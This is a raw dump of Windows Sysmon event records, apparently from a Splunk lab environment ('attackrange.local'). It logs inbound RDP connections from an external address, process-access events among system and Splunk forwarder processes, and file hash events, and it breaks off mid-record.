354300x800000000000000049058Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:50.413{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-65412-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000062757Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:54.770{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F719CC127B8102D692BEEC3496CFD59A,SHA256=A17A431CB99DECEA8B9EEA0055E87D71C7BC5959BCCC8B8A4934E4B9BA9C3EC8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000049077Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:54.860{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EAC6-607E-C606-00000000BB01}3024C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049076Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:54.860{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049075Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:54.860{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049074Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:54.860{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049073Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:54.860{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049072Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:54.860{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049071Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:54.860{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049070Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:54.860{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049069Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:54.860{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049068Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:54.860{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049067Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:54.860{85C0FFC9-B7EC-607E-0500-00000000BB01}416432C:\Windows\system32\csrss.exe{85C0FFC9-EAC6-607E-C606-00000000BB01}3024C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000049066Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:54.860{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EAC6-607E-C606-00000000BB01}3024C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000049065Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:54.861{85C0FFC9-EAC6-607E-C606-00000000BB01}3024C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000049064Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:54.563{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEDA885B131127D248AACCE03FDE44F6,SHA256=E9E2DDCA61C5D69FE4564AFF94EB309A444307F13342C519961DF1924199AC01,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062756Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:52.997{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-14503-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000049063Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:51.829{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52464-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000049062Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:51.826{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-63933-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000062759Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:55.801{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D3EDD5E533B90822AD2707504F3248B,SHA256=F261F9595810A0DC0114C48579976CED2EB8BDDAA82B4C502392988EF13F99FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049094Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:55.673{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3E7DAE3D794F332D6906FBE33A7CB19,SHA256=14593084377B57599534A7369773B47E436BB16C7EE086B2BAEC3C3859A179A1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000049093Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:55.641{85C0FFC9-EAC7-607E-C706-00000000BB01}17803488C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000062758Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:55.098{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4A23E74B28ECD927F590A7E64A5951B6,SHA256=C2641C76BC007C28E6D77A39BEC5E73BBAFD2584D44D847DDB6939778C4738ED,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000049092Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:55.532{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EAC7-607E-C706-00000000BB01}1780C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049091Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:55.532{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049090Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:55.532{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049089Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:55.532{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049088Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:55.532{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049087Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:55.532{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049086Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:55.532{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049085Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:55.532{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049084Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 